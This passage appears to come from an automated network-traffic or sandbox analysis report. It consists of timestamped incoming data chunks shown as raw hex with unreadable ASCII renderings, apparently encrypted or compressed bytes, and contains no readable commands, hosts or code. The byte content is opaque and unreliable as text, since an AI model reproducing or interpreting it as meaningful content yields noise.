2021-12-15 13:13:48 UTC	77	IN	Data Raw: 4f 6a 53 76 58 d8 f8 ee e0 2b 41 43 13 34 44 09 62 12 83 77 13 d7 46 7b dc 39 28 cb 71 91 c9 c9 9e f4 43 ae 4b 4c 61 39 93 3a 9e 42 bf 15 0e de 1d fc 7b e6 b3 48 59 b1 99 d7 3e bf 1a 40 e8 fb 0e 78 6d 07 bc 84 fd 34 68 7b 99 37 c1 5f ef d5 5c 2e a6 77 ba 26 50 de 36 f1 51 59 35 cb b8 03 80 aa 5e ad cb 30 3d 03 5c 62 3c 50 4e cb 48 e7 13 a0 f4 77 19 50 4d 0d 40 93 ec 3b b4 3c 4a ba 0a 85 6e 1c 82 8a d4 60 8a f8 85 83 e3 51 16 bb cc 33 1e c0 b9 78 5e a9 e6 bf 03 b9 65 a1 56 ce 38 d0 0d db 9f 0f 16 77 d9 8e eb 27 8f 40 67 9f 97 cb 41 02 09 71 28 38 93 e7 98 47 34 03 86 84 6f bd 4e 5a 31 86 09 47 cc c3 78 d2 aa f9 c6 bb 1c 25 f3 c4 88 c0 17 07 5b 85 8b 5e 18 84 ce 2a 5d 1b 3b ed 9a fa b8 80 aa c9 97 d8 a9 a9 b0 c5 d4 3c c0 97 01 25 57 0f 72 e1 bf 46 84 c2 6a Data Ascii: OjSvX+AC4DbwF{9(qCKLa9:B{HY>@xm4h{7_\.w&P6QY5^0=\b<PNHwPM@;<Jn`Q3x^eV8w'@gAq(8G4oNZ1Gx%[^*];<%WrFj
2021-12-15 13:13:48 UTC	79	IN	Data Raw: 5b ce 89 4f 49 e1 da e6 19 e4 68 49 75 0a f5 bf dd 6d 8c a1 65 ec 77 84 fc 02 c8 e2 ee 5d 8e ec 02 d7 19 9b 88 df 49 cb 84 da 4b ca bd 1f 97 a7 24 ad 07 65 6e a8 bf a2 c5 d1 a5 3a d8 6c 26 f4 58 47 c8 7c f4 d0 22 f2 50 51 57 3a cb 4a a8 a8 83 ed ea 20 03 7f db 34 2f 8e f1 cc 38 cb 31 56 42 62 64 b1 ba 18 a5 73 ea 46 9e 60 ac 0e e7 a7 ca 16 a1 98 d7 11 4f 02 a4 9b 95 d0 3f 68 45 98 f6 e8 6d f7 76 fc 88 41 6b 81 28 0c 7e 27 dd b6 25 78 d7 6e 6c 2b 58 58 d2 a5 9e c6 1c dc f9 a9 98 d6 60 7a c6 5e 94 b9 fa 1f a6 ef e2 5d dd e6 8f f3 14 c0 bc 5d 41 05 73 47 e1 c3 7c 11 ba 44 26 01 92 79 33 7b 6d 92 a5 3e dc 69 93 ca 17 59 15 ee e3 71 7b da bb c2 d8 94 12 45 48 c9 0b 2d 7e 35 45 93 43 dd b8 8e 67 d0 06 57 4c cc e2 a8 b6 d2 a4 65 5b 3d 02 23 14 f5 32 f3 d2 64 6a Data Ascii: [OIhIumew]IK$en:l&XG\|"PQW:J 4/81VBbdsF`O?hEmvAk(~'%xnl+XX`z^]]AsG\|D&y3{m>iYq{EH-~5ECgWLe[=#2dj
2021-12-15 13:13:48 UTC	80	IN	Data Raw: e9 bd 07 0a 05 19 26 44 6d 27 a0 60 1f 92 7d 25 1c c2 e3 15 d8 f2 af 05 77 08 29 b6 d5 8f 07 94 ba 5d 53 b8 e6 c3 c9 f3 5a a2 62 8f 3d e4 e4 4a 67 5c 5b 60 0d e6 56 e8 47 c4 34 61 79 ac 06 7c e2 eb dc dc 63 aa 45 50 e4 ff 1b d0 ae 37 d6 ab 0c 0c b7 71 19 57 59 da 69 a3 cc 64 82 f7 3b 58 9a 55 4b 01 2b 93 a3 e4 7f ca 5c 5d 10 d6 2e 03 fd fb bc 96 32 6e 53 3e 9e cb 74 b5 64 0e 5f bd c0 dc e2 03 97 b7 91 1c a1 8e e5 d4 54 8d 1c 64 c9 93 14 da ac 0e aa e4 76 d6 d0 46 b6 7d 13 8b be 12 2b cf 92 c8 e3 81 b5 62 78 84 2b 0c de 8f a3 e4 22 a2 8e 00 d4 63 00 cf 8b d6 34 ec c8 70 c8 e6 9f cc 92 9b f6 64 f7 45 66 dd 3e 68 de 26 cd 05 3d 5d c5 35 5f f7 b0 c9 cd b1 66 e7 a4 84 f1 59 6c d9 7f 3a 2f ae 54 d6 66 e1 73 91 64 e7 d2 40 97 62 9c a2 fa ef 54 32 53 0e 1a ce 39 Data Ascii: &Dm'`}%w)]SZb=Jg\[`VG4ay\|cEP7qWYid;XUK+\].2nS>td_TdvF}+bx+"c4pdEf>h&=]5_fYl:/Tfsd@bT2S9
2021-12-15 13:13:48 UTC	81	IN	Data Raw: e9 95 1c 04 88 77 a6 e1 36 2f 09 9a 77 3f eb 6b d6 1f 60 a4 ee e0 75 98 c0 c7 7b ee 08 d9 b8 f7 73 44 4e 76 48 91 eb e6 62 86 a8 73 69 c8 95 50 da 3d f6 17 74 ee 46 38 be fc b6 dd 10 07 c7 31 f4 09 c0 91 ee cc 69 17 c9 35 95 30 56 78 84 28 e5 b6 05 1f 30 b9 d4 23 45 7b 4e 38 75 bb dd 1d 88 45 a5 1f 88 54 73 24 de 9c 0e 48 4b bc ab 85 30 47 c8 70 f3 8e cc 30 b7 c2 dc 7b 5a f0 0f 4d 2b 75 03 3d 7f f2 ee 28 6a 1a 13 e7 00 5f 6a 1b 1c 09 8f 28 02 93 fa ed 83 e3 91 1a 10 62 24 55 cb f4 84 82 aa de 72 6d 06 19 da 96 9f ed 9b 37 f5 7c 2c 1c fa 9c f3 2e 99 7e d5 98 9c 4c 75 1b a8 1e 46 28 fc 9f ef 1d b8 e0 2f ca 54 3e de 78 2e 66 0b 07 15 31 36 87 82 91 74 de 32 37 88 5c 7e 07 fe 16 07 d6 c8 b3 02 0c 1b b5 a9 99 8c 72 7d e4 74 42 f9 5d ab 19 d8 f7 22 02 70 2f cd Data Ascii: w6/w?k`u{sDNvHbsiP=tF81i50Vx(0#E{N8uETs$HK0Gp0{ZM+u=(j_j(b$Urm7\|,.~LuF(/T>x.f16t27\~r}tB]"p/
2021-12-15 13:13:48 UTC	82	IN	Data Raw: 9b 43 3a d4 7d dd 63 1b 7b b0 b8 5e 07 50 83 0c a8 21 12 2d f7 28 72 d4 cd 64 0e b5 db df d5 97 c7 89 06 7b a5 c4 20 eb da f9 52 1c 68 e3 cf 52 ef 8c 83 41 ff 77 e2 f0 5e 52 1f f1 72 82 2b 37 90 aa 24 c9 71 ab 08 4c bf 76 38 b4 22 a1 ce cc 5d 4f 1d 3f 60 18 91 22 5b ef 2a bf 75 b8 9e 7d 8d 0a 16 84 90 a6 5b 8e 18 9a 77 bd 6e c9 b5 13 b7 43 8b b3 9e 63 10 19 ad da d4 d7 99 bd a4 f9 2c 66 f5 c9 98 79 35 18 ba 52 bf c4 ba 51 93 27 38 8f e8 ce 7a 19 3e 72 c3 59 17 7c f2 6c 3e ac 54 d8 c3 8e 8f 70 c9 04 bd 7f ba a0 b8 79 79 a0 13 ca d8 8c c6 cd f5 e8 42 85 17 d7 5c ab b3 7e 57 f7 0f 89 4b 6a 8a f8 ef 08 23 fc 4d ff 24 50 48 4e ba a8 d0 2a 64 60 ad 0d b6 08 ba b3 ea 5b 43 c4 a3 3f c2 71 d1 86 38 8b 85 a7 73 fe 99 59 51 6b b5 40 af 4a 41 e1 80 bb 23 b5 b6 8c 4c Data Ascii: C:}c{^P!-(rd{ RhRAw^Rr+7$qLv8"]O?`"[u}[wnCc,fy5RQ'8z>rY\|l>TpyyB\~WKj#M$PHNd`[C?q8sYQk@JA#L
2021-12-15 13:13:48 UTC	83	IN	Data Raw: 21 e3 83 1d db b2 d8 eb a7 35 98 e1 4f 12 3d 38 bb 4a e1 28 01 9d 0f 82 e7 f4 59 87 df 5c 3b e5 bd 60 ea bc e9 1e 95 d2 cd e8 f2 b2 4e b9 2e ea b0 be b2 47 1b 44 21 ba b9 2f 92 f7 3d 1d eb cc 33 cb 97 60 da 65 50 b9 0b e7 97 67 73 3c 90 ba 4e c9 b6 47 88 0a 81 0e 4b af b1 1e 71 65 41 5d 14 be 70 4d 28 75 05 8c a3 90 9c b5 78 af e7 cf 80 cc 72 a6 35 2e 6b ce 0d 66 b5 b6 95 0b a7 93 99 76 2c 16 c2 4b 78 54 73 b1 ad d3 4b 70 d8 9d 0d 8a 73 d4 a4 04 24 50 9f 7d 7a ee 23 12 25 7b 07 b2 66 9e 19 12 a3 81 7f 15 f4 9f 29 4a c6 75 e5 b5 bf 11 c2 4f 35 9b 8e eb d7 1a cc f2 f9 ee 7d 03 aa ff df 56 1e f2 34 5a 96 c8 ef bd da f3 2f ed 6f 72 21 58 22 de b5 2f af 97 7a 12 9f 19 40 ff 06 28 04 f5 ec 4d f0 6f 6e d5 8d c7 66 37 76 9f d8 cb f7 80 8c 1a 22 20 2b 98 40 0e 4c Data Ascii: !5O=8J(Y\;`N.GD!/=3`ePgs<NGKqeA]pM(uxr5.kfv,KxTsKps$P}z#%{f)JuO5}V4Z/or!X"/z@(Monf7v" +@L
2021-12-15 13:13:48 UTC	85	IN	Data Raw: aa 2c 21 6d 51 cf 8f f7 c6 73 40 79 c0 c0 12 1f 6d 32 78 d7 66 d2 bb 1c 73 93 4b a5 19 85 e1 c3 7f a9 73 bf 42 67 32 cc 03 2b 86 63 33 c6 a1 ab 81 62 ba b1 ed 80 e5 f0 da 9c a6 41 32 4b 0c 15 8e 5e 5c e1 9f b5 fb a1 a4 15 8d 5e 3c b7 db ed 06 64 8f 1a 38 af f6 09 ba 72 16 02 4e ac 54 b0 9b 51 bd 66 bd 41 d5 31 3d 5d 26 80 b5 c3 1a b8 89 96 00 30 e8 bf 48 a0 1c b6 b1 49 5b 3c ea aa d2 f0 ef c2 10 61 24 ac a3 4d 2b 34 81 19 45 43 f9 7d 2a 9e 87 14 df 3a 10 ed cc 3b ae 95 13 10 da 01 2b d2 a3 e4 3e c0 e7 d3 ec 8e 02 20 b0 ee 4e f6 14 82 da 7b 61 8b b2 a1 e5 ce 4b 3b 1c c5 e0 87 15 65 8b 71 cd 96 cc d6 44 93 1e 6c c3 a5 cd cd d1 d2 1b 0f ad fb ee cf f3 bf 25 8f be 30 f0 04 d7 6a 3b 9f dc 51 0d 9b c4 69 b9 d1 a0 22 fe 2b 8c 08 cc b8 dc 23 5c b2 34 65 be 45 c6 Data Ascii: ,!mQs@ym2xfsKsBg2+c3bA2K^\^<d8rNTQfA1=]&0HI[<a$M+4EC}*:;+> N{aK;eqDl%0j;Qi"+#\4eE
2021-12-15 13:13:48 UTC	86	IN	Data Raw: 64 c1 84 25 87 9b d2 8e d7 01 10 a2 ac 6d 35 80 18 1e 1f a2 1b 7b 3b e6 99 e4 33 04 72 e5 c1 12 2d 7e 5d 42 cb 21 29 d2 a5 ce df e6 f9 92 04 8b 9c 9d 34 5b 36 89 11 f4 2b e3 9e 4a 86 64 9a ff 3f af fa c5 10 84 4e 8e f5 65 05 c2 33 91 29 e0 88 3e 6a dd a9 34 59 b1 f7 22 81 ca af 38 f4 90 3b fd 1d f4 3d 4b f9 0e 57 8c ba 5a 4d 83 9f b6 13 1f f5 c6 93 75 86 1e b9 6e 28 97 9a f2 20 a7 c9 99 a3 65 94 b7 6d d4 7f 3c 7d 86 7c 7d 01 5f c2 49 55 67 ca 00 41 0f f4 82 73 de 27 b1 89 45 d9 8a 70 e4 14 a9 5b cb b0 bf 39 43 66 2b 27 3c ef 20 1b a7 52 cb c5 c5 d4 2d f0 84 00 f4 92 cb 50 4d 03 c9 7f 34 f3 19 69 ee 5d 33 81 6e 1c 09 89 8c 75 8b ab 07 54 0c 14 c6 68 59 df 86 be b8 77 55 e4 37 ed e8 79 dd 7a 5d 3e 67 5a 43 cb 9f 3f 16 77 c9 9e e9 0e d4 7a 8f ad 78 9d 5d db Data Ascii: d%m5{;3r-~]B!)4[6+Jd?Ne3)>j4Y"8;=KWZMun( em<}\|}_IUgAs'Ep[9Cf+'< R-PM4i]3nuThYwU7yz]>gZC?wzx]
2021-12-15 13:13:48 UTC	87	IN	Data Raw: 07 30 b9 16 9b df 93 6e ef 4d 14 23 80 36 6a 55 e6 8b a0 3c 37 cb 67 c8 5a b4 c2 cd d0 e5 27 e5 ab 46 55 9c df be 20 c1 52 b1 e4 a5 1a 32 50 3d 6c c3 58 95 39 1b 7e 69 6c 23 26 de a2 2a b8 b2 15 10 63 29 ba 90 f2 8e ab 10 14 bb 9f 24 a0 5b a4 d6 65 92 a3 d7 47 16 f7 28 7c e1 6b 39 0e 2a b1 6e 89 e2 83 8d f2 ee 65 8e e4 8e a1 1c 40 60 89 38 ad ef 88 f2 c2 ff ad 33 24 e0 26 83 a2 d9 ef 74 19 3c 99 02 6b d6 21 87 c8 2a 50 6e a7 86 9e 45 bd 24 51 6b 3a 6b 03 e0 66 fb 0f 03 29 20 8b 6c 96 92 5a 84 df 46 a4 8d 44 1d 3c bc 02 b0 b1 a6 f2 da fc 7f 15 e4 43 a4 bc 87 ee 69 98 c3 9c 96 47 35 7a 99 82 92 7c a6 99 a4 33 d8 08 a1 a9 18 ec e1 71 f0 56 15 09 a8 16 84 78 ca b0 6b 0b d0 d2 c3 aa 07 df 97 89 6e 99 59 cd 31 f1 8b 5d 42 2e aa f7 c6 79 e2 7a 0e 03 f5 ac 20 4b Data Ascii: 0nM#6jU<7gZ'FU R2P=lX9~il#&c)$[eG(\|k9ne@`83$&t<k!*PnE$Qk:kf) lZFD<CiG5z\|3qVxknY1]B.yz K
2021-12-15 13:13:48 UTC	88	IN	Data Raw: de 57 e5 3a 6f 34 10 6c d8 ec 3b d0 40 b1 63 96 b8 82 67 06 78 c4 bf d6 f3 97 d8 72 06 fa 47 22 b3 7c da 00 1b 56 84 98 b3 7b 0a 1b b5 a9 99 88 a4 9e c7 b1 5c 5b 61 4e df 88 77 db 52 ef 08 34 6d 88 ff 4b c8 d2 2f a6 66 b0 d9 45 bd db 0c b4 fc 8e 53 87 dc 64 70 cf 88 2f c4 f9 f5 35 c8 c7 52 b8 ed 70 7f b5 f9 a8 12 4c a4 b8 80 49 40 fd ed 63 00 89 37 38 38 a5 a5 1a b5 e4 98 10 b0 b7 e5 1e 52 44 34 c8 fa 87 64 d0 ca 36 35 51 bb ad 56 b6 1e 30 21 c4 85 a4 ea 5a dd 45 8b 8b 79 78 ce e6 5a 41 b3 45 a2 0c 7a fd 11 1f 93 dc 8f 35 59 74 2a 03 1e da fc 58 e6 a2 ee 01 a6 92 10 fc 9c ca f0 2f 56 bc 21 fc 49 00 3b 86 49 67 2c 4f 6e 85 12 f2 9e 0f 5d 92 64 91 a2 ff f9 1e 99 5d dc b0 00 74 76 33 0c cf 7d 00 2f 70 a1 b8 02 8c 25 2f dc da 79 e5 44 df 83 91 10 b7 21 20 ff Data Ascii: W:o4l;@cgxrG"\|V{\[aNwR4mK/fESdp/5RpLI@c788RD4d65QV0!ZEyxZAEz5Yt*X/V!I;Ig,On]d]tv3}/p%/yD!
2021-12-15 13:13:48 UTC	90	IN	Data Raw: 63 5a 1e 2d 6f 48 63 c2 b8 71 b2 99 95 fc 0b 11 59 93 b5 a9 fe 46 bf 15 1a 5a 91 f6 48 cf fc fc 2b 94 b2 88 b0 e2 5e 15 74 d2 b8 a1 71 20 92 0b ad f5 6a 3b df 12 d0 53 79 dd fe 8c 18 fe 10 7f ad b6 79 2c f5 ea 76 64 66 22 20 3c 5f 05 c4 a0 a3 08 5e 4c e6 ca 62 11 a9 41 85 7a 2d b8 55 ba 9d 38 d1 1e 5a c4 21 78 26 ed f0 f7 2c 21 0f bb ad 30 fc 47 53 06 c8 f3 14 b6 d0 14 18 65 4c 34 69 18 fc af 9a 47 97 61 72 18 28 17 89 40 4d a6 b3 30 3c ca c1 e4 66 72 92 02 fd d5 20 29 da ef f0 f0 81 32 3d ae 5d 32 14 8d 1a 83 33 d0 33 ff 58 fa 72 f4 04 1c f7 25 7f 05 e1 7d 2e ce ac 81 2b 06 0f 23 14 ce 90 ea d8 9f 47 74 b4 e5 c0 62 21 eb 1c 67 68 ca d9 72 ce 7c d0 25 a5 25 a7 b9 5d 8a dc ff 4c d0 72 bb 33 8a 2f 3d 48 54 9b 5e 7d bd 2f d5 f6 b6 36 a6 26 3e 37 05 7a e8 bd Data Ascii: cZ-oHcqYFZH+^tq j;Syy,vdf" <_^LbAz-U8Z!x&,!0GSeL4iGar(@M0<fr )2=]233Xr%}.+#Gtb!ghr\|%%]Lr3/=HT^}/6&>7z
2021-12-15 13:13:48 UTC	91	IN	Data Raw: 20 c5 7b 4d 02 35 07 0d 46 8b e3 73 03 e9 7c 9f fb 66 4d 26 26 e8 6e 25 7b c1 13 74 2b 19 00 f6 ee 29 fd 32 25 f5 03 db 6f c2 39 fa fa 15 e0 20 1e dc 59 67 f8 d0 c6 77 ec 3a a0 74 15 1b af a2 6c 6a 8a 9f 8b 78 90 bc 97 85 91 7e 1a d0 8e e9 fa 34 ab dc b3 d6 da f7 6c 86 6c f8 f6 74 5e 3b 73 0e 4d 7a 40 14 8b 98 b6 49 c9 09 31 8a d7 52 0d 90 c0 ec d9 e8 5b 9b 29 27 a1 e4 10 d7 60 a1 72 4f eb 7d 3d a5 7f 4d 9b 2a f9 95 6d 24 46 fb db 1f a4 76 fb 5a cf 37 87 b7 31 2a 34 d1 9d fc 9e f5 d1 7d e1 ae f1 85 e7 9e b8 ac ec 24 32 21 17 75 5a cb 2c 84 97 f9 5f 6d 61 8d 48 15 63 a1 94 be 09 48 86 23 d4 dc 04 32 b4 8c 7a 32 3c 12 c1 5e 56 a3 54 8d 51 27 30 12 f1 ac 43 25 1f 0a f7 40 ee a4 31 84 53 68 2a 36 6b 85 f9 7e 81 b6 1f d6 2e 7c 32 22 6c 2d 4a dc 4b c3 36 48 5c Data Ascii: {M5Fs\|fM&&n%{t+)2%o9 Ygw:tljx~4llt^;sMz@I1R[)'`rO}=Mm$FvZ714}$2!uZ,_maHcH#2z2<^VTQ'0C%@1Sh*6k~.\|2"l-JK6H\
2021-12-15 13:13:48 UTC	92	IN	Data Raw: 86 e1 05 cc 28 53 a2 79 d5 98 a4 1b f7 18 dd 6c 41 56 c7 6c 3b 8b 3c bc 66 d7 11 c1 aa b8 47 c9 7b 7d 3e 9a 44 fe ae d1 f9 4b be 24 ae ee 2c 51 2f 16 6d 9e 45 d6 f7 0d 1b b5 7b 0b 70 07 85 66 c5 3a c2 ea 4e 02 20 0a dd aa ca 9a 01 b4 81 74 0e 8b b1 d0 fb 34 3b e6 48 87 c3 d3 d9 19 89 53 87 0f f6 88 45 93 8e b0 9f 6c ee c8 02 e2 c5 eb 88 59 fd 9a 3c 43 c7 e1 21 9f 34 dc be 66 36 8f 1d 62 38 38 e2 11 e5 4a e4 98 08 6e 33 cf b0 3a 9c 03 08 c5 0d 19 b3 21 67 be 57 60 6d cb c9 9f db 53 c1 00 30 ad 4c de 00 d5 09 c7 6c 9e 0e d2 d3 a3 ae 06 61 7f 14 99 9e 95 22 75 91 f9 7a f7 0e 37 5d 3f 66 1e 02 9d 89 41 e6 4f fa 5f 16 6a 52 42 63 8d dc 06 8b 34 06 c0 73 2c 4a 54 99 77 ad 33 f2 a2 ee 33 c3 c9 76 b1 62 60 d7 0a 17 a3 00 6c 3f 42 4d 73 66 02 fb 83 48 83 d7 ae 6a Data Ascii: (SylAVl;<fG{}>DK$,Q/mE{pf:N t4;HSElY<C!4f6b88Jn3:!gW`mS0Lla"uz7]?fAO_jRBc4s,JTw33vb`l?BMsfHj
2021-12-15 13:13:48 UTC	93	IN	Data Raw: 38 bb 62 3a 30 f2 a5 65 46 c5 bb 5a 16 44 02 5b 98 b4 23 70 93 66 c3 e5 91 7f 5b 01 33 b0 91 64 e7 73 8d 97 c7 e7 d6 ef 04 93 1d 30 2c 4f 03 f2 88 83 46 ea 71 40 c6 ee 24 04 fb a9 f2 2a e0 d3 35 c8 f3 78 44 b8 2e cb 07 04 af eb 88 da 62 d2 0c 9b c8 da 2e ae e7 c4 c2 8f de e4 ce b7 18 43 1e b0 a1 30 b7 70 6e 4b 03 4a 26 2b f2 ae af 63 23 bc c3 38 ef fb ef 99 e4 11 ba 3c e8 36 42 d9 01 e5 fb 00 fb 46 0a 48 00 82 e5 d6 ba 12 fa af 17 fe 55 ac ef b1 b0 57 a1 b8 13 70 81 52 f5 e3 0f 49 c6 24 c4 14 d7 ba ca 3a b5 35 df c9 a7 ae 7d 60 19 82 9a 35 36 ef 82 e8 d4 a0 83 ba 85 aa 46 18 04 40 58 ab 8a 15 03 ab b2 49 e3 53 d1 9b af ef 2e 02 44 70 f8 fe 62 b9 25 4f c8 e3 c0 15 40 20 9c 52 e1 f8 38 ed 9a a0 87 ca 22 6b 0b b3 eb 25 c2 4e c0 ad e7 ab e8 fc 80 76 55 17 08 Data Ascii: 8b:0eFZD[#pf[3ds0,OFq@$*5xD.b.C0pnKJ&+c#8<6BFHUWpRI$:5}`56F@XIS.Dpb%O@ R8"k%NvU
2021-12-15 13:13:48 UTC	95	IN	Data Raw: c4 68 24 43 2b 0e 36 9c 37 40 c9 2d a7 1d 0c f8 b2 7c 00 19 8d 81 d6 b9 e8 e5 73 ba 5e cc 75 b2 e1 7e 64 5a 10 c4 d0 f8 ec db 89 77 1a cf 60 27 d0 b6 4d e7 96 7b 00 e5 e4 c9 7a 0f dc 77 26 47 80 cf 31 96 86 66 26 bb a9 13 8f 49 bf e1 b4 54 2f 28 0f 0c 74 53 e6 b0 cc 31 29 c8 ad e1 d8 18 ff 33 70 93 a4 b8 12 92 a7 e1 fe a2 f7 94 a1 87 9d 43 10 75 bf 50 3b e4 48 8f 96 9e eb c8 08 c8 d1 a5 70 9c 6b c2 a3 4d 46 fa 70 91 5e 7a dd c5 19 92 18 94 db 1f 4d 9a 9b 5a 2b f3 0c 96 88 5d 35 5e 13 b2 83 a4 18 96 75 97 26 0e a3 af ec 05 f3 2e 17 e0 bd 47 49 88 7c a1 90 c2 cb d5 1a f9 c0 b8 ae 0d 6e 02 ef b2 8f 12 8d 65 ae 47 e0 cb 60 fc 43 34 9b de fe e2 b5 5a 9c aa b0 cb 0e cf 0c 53 4a 4b 98 f6 63 60 17 b7 95 18 13 8c f6 b9 17 6e 5e 27 1c 72 a1 c7 d0 94 37 dd a8 6b 65 Data Ascii: h$C+67@-\|s^u~dZw`'M{zw&G1f&IT/(tS1)3pCuP;HpkMFp^zMZ+]5^u&.GI\|neG`C4ZSJKc`n^'r7ke
2021-12-15 13:13:48 UTC	96	IN	Data Raw: de 01 d2 f9 e6 d4 de be b0 ac bc 34 97 be 1a ab 74 d2 85 4d 87 a9 a3 c6 49 10 08 58 b3 34 2e e0 64 95 22 e7 8d 44 cb 54 3e de 7b ca 62 d7 0f 54 10 3e 87 2d 92 11 ac d5 cc 77 f0 a1 14 4d 47 8a 5b 10 ac f0 0f b5 a2 fc 66 98 ff 92 14 6f 49 54 2f 46 4f 2f 08 dd 05 70 d2 84 38 90 27 83 91 85 33 3b a1 e3 7b b6 12 d8 b6 e8 da 74 ac 2b d2 e5 68 c4 5a fc 97 eb 57 09 14 67 b9 03 14 77 5b 27 27 05 58 4a 64 74 fc fb af ff 8e a4 37 d9 66 e1 96 43 df 21 02 5c 9f 74 fa bb eb 18 3a c1 00 0b c5 a3 a1 21 84 2e be d4 f4 ec 15 b0 36 2c fe 1d 08 7e 96 a2 21 50 6f 87 46 2a 9e 5d dc 5a 4b 14 ac 9e a6 89 2a ec 42 32 dd 55 06 2a 2a 90 67 9a 04 81 a8 7c 11 65 ed 94 9b af 3e 25 84 04 12 d9 58 d6 4b 8b b7 41 08 38 cb 06 36 85 77 bd 13 f8 a2 ee 31 7d 08 00 f5 9d 12 df 5f 18 a1 00 10 Data Ascii: 4tMIX4.d"DT>{bT>-wMG[foIT/FO/p8'3;{t+hZWgw[''XJdt7fC!\t:!.6,~!PoF]ZKB2U**g\|e>%XKA86w1}_
2021-12-15 13:13:48 UTC	97	IN	Data Raw: d8 0d b5 38 91 89 e2 40 f4 11 4b 85 39 3b 04 f3 be 87 f6 06 de 21 8a c7 e5 a0 96 2a d9 0b a9 58 01 b7 e3 ab 3d a4 e8 3a 60 fe 07 f4 29 b5 b5 3f 04 c8 d8 8f f9 de f2 4d 6e 03 91 f3 b2 9b 44 6a 03 58 cf 36 64 69 42 c5 f3 76 55 4d c9 64 4a df 65 20 53 01 c5 df ee 6e 4f 34 5b e8 8d 61 00 a3 c6 80 38 fc d0 94 02 c0 ff fa cd 6c 5f 8b b2 9f b1 05 55 ba dd b1 b1 31 a5 c5 1f 8a 47 f3 d6 a5 c1 c0 75 af 09 b7 6f c4 f5 8c 2c 30 fd e5 f6 b2 d1 fa b9 d9 17 11 ba 02 85 e5 5d 2f ae 9c 92 ca 84 9b e2 72 1c f9 63 c1 97 16 18 11 28 34 0f 17 27 fa 80 19 19 3b ca 3e 4d 55 86 6f 00 41 ee c0 3c cb e0 b1 92 88 ec ad 23 70 65 69 56 a4 2a ff e1 3d 90 be 3d d8 0c 42 8f a3 67 08 5e 3a 19 f3 c5 49 bc 3f e3 82 14 16 69 0b 4b 67 3e 72 d9 df df 0d e9 50 ad ee e0 e2 e4 3f 01 14 64 ce 62 Data Ascii: 8@K9;!X=:`)?MnDjX6diBvUMdJe SnO4[a8l_U1Guo,0]/rc(4';>MUoA<#peiV==Bg^:I?iKg>rP?db
2021-12-15 13:13:48 UTC	98	IN	Data Raw: 16 8b e7 f4 60 7f 0c ae bc cc 73 b7 ed 85 a8 c2 0f 2b f1 b5 49 d4 35 c0 c9 a6 30 67 17 d3 b4 18 13 65 36 20 df 56 7b 80 d9 51 b6 27 68 68 43 ff a6 db aa 4c 4a 51 d4 2b a8 1c 9d 7f 7a ed 81 13 3b f7 4d f6 d4 4a 6d 73 db e5 f3 fd 04 ff 8e 69 7e be cc b4 4f b6 87 e0 a3 4e 00 f8 79 64 7e b3 3f 05 cb 27 70 c5 9d 97 55 eb 54 c3 98 bf a0 e0 ca d0 96 b2 e8 63 aa 57 25 f3 cb c6 bf 7c 29 5b db 01 5d 01 6d 46 4f 6e c9 36 2f 4d 32 27 06 ad 05 3e 09 a0 6d 27 4e 5f 70 aa fc 64 75 e5 1b 5a 09 9a c9 6a 61 19 6c 2c 50 bd 3e 68 30 32 2f 0b 0e cd 5d 67 ba 80 de 6f 6c c6 27 94 2a 43 8d bd 3d f3 69 17 38 e3 d6 87 e0 1d f5 3b a5 71 8e 0b 60 c3 68 6a 1f b2 5c 9c 3e 91 e6 51 6d 17 c9 0f 5d 24 76 fa de 02 e5 f2 84 ef ed 62 c2 ab 79 c1 65 3d 4a 3d ce aa 32 62 49 ac eb 1e b5 ec 87 Data Ascii: `s+I50ge6 V{Q'hhCLJQ+z;MJmsi~ONyd~?'pUTcW%\|)[]mFOn6/M2'>m'N_pduZjal,P>h02/]gol'*C=i8;q`hj\>Qm]$vbye=J=2bI
2021-12-15 13:13:48 UTC	99	IN	Data Raw: 4c b3 c8 f5 43 75 8f dc ee 29 b6 4f 2d b7 9e b2 fb 5d 47 cc 36 2a 0e 6f 34 85 04 6b cf 0e d6 5d bf c4 42 4a ad 98 26 61 a8 7e 0d 14 da a6 6f 01 03 00 6c e5 8a ff 3c b1 0a 7e 14 d4 84 17 e3 8e 9d 01 ec 4b 33 6d 7e 13 5f a8 a9 00 eb 84 33 18 e8 84 4f 00 d6 34 65 0e f2 75 a1 e9 e6 d7 a0 52 64 44 75 25 92 1e ed 1e 95 8e 22 30 47 de 24 89 39 4e ad 46 95 7a ab 9c 38 0b 5b 94 97 88 f4 c8 d1 dd a8 ed 68 1a ae 43 0b 3f 51 23 c8 6f 2b 79 92 7a b1 2d ce 3b cd 79 99 6d 0a 25 a4 ab 29 99 6f e7 00 a3 16 d3 2c 8e 44 51 a1 b4 28 8a 92 d3 3a fe e8 c1 e7 5d ca f4 9b 76 02 77 c8 ca 6b 20 14 11 2c ce 5c cd 40 31 96 aa a1 9c 9d b2 81 9c af 60 ad 6b 81 8e a6 5a 74 26 c1 b1 79 00 f6 91 08 8f 80 4b 4b c0 70 f4 e0 3a c9 ae 53 9b 5e e8 e8 94 a0 9e 51 e2 7e 7b 52 3b 2c 98 1d 85 df Data Ascii: LCu)O-]G6*o4k]BJ&a~ol<~K3m~_3O4euRdDu%"0G$9NFz8[hC?Q#o+yz-;ym%)o,DQ(:]vwk ,\@1`kZt&yKKp:S^Q~{R;,
2021-12-15 13:13:48 UTC	101	IN	Data Raw: c3 4f a8 06 e5 b4 d6 39 15 da 93 30 f6 9e 0c 08 34 6a a6 5b 14 5e f0 73 d8 71 f7 44 a5 2d 5f 63 bd 35 21 ee 48 d3 71 8c 6f 1c 09 52 38 c2 5b 07 10 00 aa 18 98 60 78 86 c6 13 32 94 50 10 1e be 63 a4 ee 0f 05 d3 68 7b 43 cb 47 92 47 dd 9c 7e 30 bd d1 79 ee bb e6 75 30 ab 1e 46 2a fe e3 68 dd b7 32 e4 ca 07 d6 6b 33 2d ce 41 c7 2d c8 c9 70 d2 28 4b 55 ee cc fc d6 3c 07 cc 52 f7 57 0b ff 08 f0 e4 a2 da ab 66 00 4a 61 b9 7d 26 27 3c e2 cf 7c 67 a9 13 5a b7 68 c1 9c 34 f9 59 62 35 f0 33 d3 17 b6 01 bb 01 22 f7 d1 6c 59 19 60 84 d7 71 3b 1f 23 bb a9 04 4f 34 9f f5 48 a8 72 fd 21 82 11 c6 4b 8d 15 57 eb b2 04 d9 26 6a d0 0b 5c d5 4a 67 0c 89 ae 18 30 d0 bf 73 f7 a4 d2 84 6d 5b bf a5 f3 a7 bb b5 4e 57 23 4c ac a0 8d a6 30 37 de 52 0e a7 65 c2 c3 2a 51 17 3a 03 35 Data Ascii: 